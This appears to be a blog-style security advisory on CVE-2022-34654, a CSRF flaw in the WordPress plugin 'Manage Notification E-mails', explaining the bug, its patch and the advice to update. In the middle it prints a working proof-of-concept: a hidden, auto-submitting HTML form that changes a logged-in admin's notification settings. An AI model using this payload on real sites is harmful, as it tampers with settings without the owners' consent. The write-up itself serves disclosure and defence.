Managing notifications in WordPress is essential, especially for busy sites. Many site owners have turned to the "Manage Notification E-mails" plugin by Virgial Berveling. But in 2022, a serious vulnerability was found that exposed sites using version 1.8.2 or below to a Cross-Site Request Forgery (CSRF) attack. This post breaks down how this bug works, how attackers can exploit it, and what you can do to stay safe.
What Is CSRF?
CSRF, or Cross-Site Request Forgery, tricks logged-in users into performing unwanted actions on a web app. If you’re logged in as an admin, an attacker can make you perform dangerous actions—like changing plugin settings—by simply having you visit a malicious site. Think of it as digital pickpocketing, where your session is used against you.
About the Vulnerable Plugin
Plugin: Manage Notification E-mails
Author: Virgial Berveling
Affected Versions: 1.8.2 and below
WordPress Plugin Page: wordpress.org/plugins/manage-notification-emails/
This plugin lets site owners control which notification emails WordPress sends, such as new user registration or password change notices. It offers a clean admin panel to toggle these notifications on or off.
The Vulnerability
The plugin’s admin page didn’t properly check for WordPress nonces (security tokens) when saving settings, which should protect against CSRF. Without nonce verification, an attacker could create a malicious webpage that tricks a logged-in administrator into changing the plugin’s notification settings without their consent.
Sneaks in a forged request
The site secretly submits a form to the victim’s WordPress install, changing notification settings.
Attackers would host a page with a hidden form like this
<form action="https://victim-wordpress.site/wp-admin/options-general.php?page=manage-notification-emails"; method="POST" id="csrfForm">
<input type="hidden" name="mne_notify_new_user_admin" value="">
<input type="hidden" name="mne_notify_new_user" value="">
<input type="hidden" name="mne_notify_password_change" value="1">
<input type="hidden" name="save_manage_notification_emails" value="Save Changes" />
</form>
<script>
document.getElementById('csrfForm').submit();
</script>
When a logged-in admin lands on this page, it silently submits the form, altering which notifications WordPress sends. The admin might not even know anything changed.
Original References
- Plugin Vulnerabilities Disclosure: wpscan.com/vulnerability/73597fcf-6112-42e7-b634-da5a090f6592
- Patch Details: patchstack.com/database/vulnerability/manage-notification-emails/wordpress-manage-notification-e-mails-plugin-1-8-2-cross-site-request-forgery-csrf-vulnerability
- CVE Listing: cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34654
How Did The Developers Fix It?
The patched version (1.8.3 and up) added nonce checks. Here’s a simplified example of what the fix looks like in PHP:
if (isset($_POST['save_manage_notification_emails']) && check_admin_referer('manage-notification-emails-save')) {
// Save the settings securely
}
This function (check_admin_referer) checks for a valid nonce. If it’s not there—or not valid—the request fails.
Conclusion
CSRF remains a common web vulnerability—easy to exploit if developers forget a single line of security code. Thanks to responsible disclosure and a quick fix, this bug is history for up-to-date WordPress sites. Still, it serves as a reminder to always keep plugins current and be wary while browsing as an admin.
If you run Manage Notification E-mails, check your version, update if necessary, and stay alert. Security is everyone’s job!
References
- CVE-2022-34654 at WPScan
- Manage Notification E-mails Plugin
- Patchstack Security Advisory
- CVE-2022-34654 details
Timeline
Published on: 11/28/2022 20:15:00 UTC
Last modified on: 12/01/2022 22:57:00 UTC